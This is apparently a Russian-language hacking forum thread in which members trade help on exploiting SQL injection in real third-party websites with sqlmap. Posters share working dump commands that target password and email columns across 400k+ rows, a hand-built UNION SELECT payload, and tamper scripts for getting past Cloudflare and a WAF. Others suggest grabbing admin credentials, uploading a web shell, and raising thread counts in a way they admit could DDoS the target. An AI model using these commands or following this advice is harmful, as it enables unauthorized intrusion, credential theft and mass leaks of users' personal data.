тут лучше тогда сразу искать нужные данные --search -T admin и т.д --search -C pass чтобы время не тратить. И потоков побольше , если можно --threads=15! Может еще есть какие уязвимости, которые можно в Union или Error раскрутить
Есть Sql-inj. Выбивает такой error Code: Database_Exception [ 1064 ]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 [ SELECT id FROM `users` WHERE `id` = '1'' ] Сайт под cloudflaer'ом, его в sql-map'е обойти труда не составило, но ошибку он не видит. Пробовал и так /user/1* и так /user/*. Помогите пожйлуйста.
Mysql:MariaDB Type: AND/OR time-based blind Если копать сайт вручную, он блокирует запросы при выборе user(), version(), database() - вручную таблицы выводит. Используя sqlmap начинаются рождаться всякие птеродактили в ввиде ошибок: Code: [18:20:25] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) [18:20:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions и Code: [18:19:32] [ERROR] invalid character detected. retrying.. Я голову сломал как обойти неправильную кодировку. пробовал так: Code: --tables --fresh-queries --time-sec=30 --no-cast --fresh-queries и так Code: --table - space2comment --tables --fresh-queries --time-sec=30 --fresh-queries --hex Таблицы не видит из-за неправильной кодировки. Все же, как правильно составить запрос, чтобы прочитать их?
Взял запрос sqlmap и попытался модифицировать Code: -6576%20UNION%20ALL%20SELECT%20CONCAT(0x716a7a7071,0x4c754378766f69486f7a7270574e796c525666716c766b61524c435a644a4565566d73534a424348,0x716a766b71),71,table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=0x64623139353861%20-- Выводит пустую страницу, но при запросе Code: index.php?id=-6576%20UNION%20ALL%20SELECT%20CONCAT(0x716a7a7071,0x4c754378766f69486f7a7270574e796c525666716c766b61524c435a644a4565566d73534a424348,0x716a766b71),71,user()--%20giyw%20--- уже выдает результаты. Как с помощью sqlmap или уже вручную составить запрос и вывести эти таблицы
Крутится на 80 порту демон "DataPalm" sqlmap при таком запросе выдает несуразицу Code: -D BAZA -T TABLE -C password --dump --threads=10 --hex --parse-errors --cookie="cookies" --random-agent Spoiler: text Вот как выдернуть данные из колонки, чтобы они не были дичью? [12:04:03] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [12:04:03] [INFO] fetching entries of column(s) 'password' for table 'documents' in database '' [12:04:03] [INFO] fetching number of column(s) 'password' entries for table 'documents' in database '' [12:04:03] [INFO] resumed: 2417 [12:04:03] [INFO] retrieving the length of query output [12:04:03] [INFO] retrieved: [12:04:04] [WARNING] reflective value(s) found and filtering out [12:04:08] [INFO] retrieved: [12:04:08] [INFO] resumed: \x08\x18 [12:04:08] [INFO] retrieving the length of query output [12:04:13] [INFO] retrieved: [12:04:13] [INFO] resumed: \x07\xffs_a3RD [12:04:13] [INFO] retrieving the length of query output [12:04:18] [INFO] retrieved: [12:04:24] [INFO] retrieved: [12:04:24] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically [12:04:24] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) [12:05:10] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more) [12:05:12] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [12:05:15] [INFO] retrieved: [12:05:15] [INFO] retrieving the length of query output [12:05:19] [INFO] retrieved: [12:05:25] [INFO] retrieved: [12:05:28] [INFO] retrieved: [12:05:28] [INFO] retrieving the length of query output [12:05:32] [INFO] retrieved: [12:05:39] [INFO] retrieved: [12:05:45] [INFO] retrieved: [12:05:45] [INFO] retrieving the length of query output [12:05:50] [INFO] retrieved: [12:05:56] [INFO] retrieved: [12:06:00] [INFO] retrieved: [12:06:00] [INFO] retrieving the length of query output [12:06:09] [INFO] retrieved: [12:06:20] [INFO] retrieved: [12:06:25] [INFO] retrieved: [12:06:25] [INFO] retrieving the length of query output [12:06:30] [INFO] retrieved: [12:06:35] [INFO] retrieved: [12:06:39] [INFO] retrieved: [12:06:39] [INFO] retrieving the length of query output [12:06:43] [INFO] retrieved: [12:06:50] [INFO] retrieved: [12:06:54] [INFO] retrieved: [12:06:54] [INFO] retrieving the length of query output [12:06:59] [INFO] retrieved: [12:07:05] [INFO] retrieved: [12:07:09] [INFO] retrieved: [12:07:09] [INFO] retrieving the length of query output [12:07:13] [INFO] retrieved: [12:07:22] [INFO] retrieved: [12:07:26] [INFO] retrieved: [12:07:26] [INFO] retrieving the length of query output [12:07:30] [INFO] retrieved: [12:07:35] [INFO] retrieved: [12:07:39] [INFO] retrieved: [12:07:39] [INFO] retrieving the length of query output [12:07:44] [INFO] retrieved: [12:07:50] [INFO] retrieved: [12:07:55] [INFO] retrieved: [12:07:55] [INFO] retrieving the length of query output [12:08:01] [INFO] retrieved: [12:08:08] [INFO] retrieved: [12:08:13] [INFO] retrieved: [12:08:13] [INFO] retrieving the length of query output [12:08:13] [INFO] retrieved:
Подскажите пожалуйста из-за чего может быть такая проблема? Spoiler: error [08:22:58] [INFO] fetching database names [08:22:58] [INFO] fetching number of databases [08:22:58] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) [08:23:16] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [08:24:57] [ERROR] invalid character detected. retrying.. [08:25:33] [ERROR] invalid character detected. retrying.. [08:26:10] [ERROR] invalid character detected. retrying.. [08:26:46] [ERROR] invalid character detected. retrying.. [08:27:23] [ERROR] invalid character detected. retrying.. [08:29:25] [ERROR] unable to properly validate last character value ('3').. [08:30:02] [ERROR] invalid character detected. retrying..
еще часто ошибка когда у вас слабый интернет , высокий Ping (если через Wi-Fi) или что-то качается попутно, забивает траффик , тогда sqlmap не может верно расчитать время и начинает сыпать ошибки.
Пробовал и то и другое... Интернет хороший, первый раз столкнулся с такой проблемой.. Уже добирался до дб этого сайта, но было много ошибок, решил другой параметр пустить, теперь и тот и другой дает эти ошибки..
похоже на работу waf. Попробуйте тогда --tamper= и из списка https://github.com/sqlmapproject/sqlmap/tree/master/tamper может получится обойти
Спасибо, попробую! Некоторые из них уже пробовал..Вроде их через запятую несколько можно сразу использовать или лучше по одному?
через запятую да ,их комбинировать нужно ,к примеру разный регистр+замена символов и т.д В идеале бы найти такой линк ,где точно не ТаймБлайнд --technique=EUB
Перебором их подбирать? И еще хотел спросить, дамплю таблицу..1 строка примерно 10-20 минут, когда выбираю только 2 колонки(-C email,pass) все 400к+ сливаются за секунду, но строки "NULL", хотя при дампе все таблицы видно, что они не пустые.. --hex помогало при таких случаях, но сейчас такая же скорость, как и была.
тайм-блайнд это самый медленный из возможных способов и ненадежный, т.к может выдать при лаге интернета 1 неверный символ и все. Лучшим решением в такой ситуации или поиск другой скули в другом линке ,не таймблайнд ,или поиск и раскрутка данных админа( к примеру --search -T adm --search -C pass) , заливка на сайт и уже сливать с шелла все
Таймблайнд это пзд. Если mysql.user не под тобой или данных админа нет-это пздц борода втройне. Только ныть или месяцами мучаться. Даже хэш админа иногда слить только с 5го раза получается, т.к. как выше гримнир отписал-малейший косяк коннекта-и пздц. Если есть такая эррорка на таргете, то есть и другие 99% из ста. Ищи, да обрящешь =)
Неугомонный... Дело в инете, серваке, баге? Откуда мы знаем! Если не боишься пару к на дампе потерять, зайди sqlmap/lib/core/settings.py и найди пункт MAX_NUMBER_OF_THREADS,максимум по умолчанию 10 потоков, ебани 500 чтоли. или аххулиард. Советую не более 200. И так на 5-10 впс \ вдс
С инетом все в порядке, сам не знаю в чем проблема, с 2мя сайтами только проблемы. Сделал как ты сказал, поставил 70 для теста, ничего не поменялос
можно ставить больше 10 потоков --threads=500! и он тогда проигнорирует 10 ,только смысла да нету от такого количества.сайт может заблочить или ддос устроит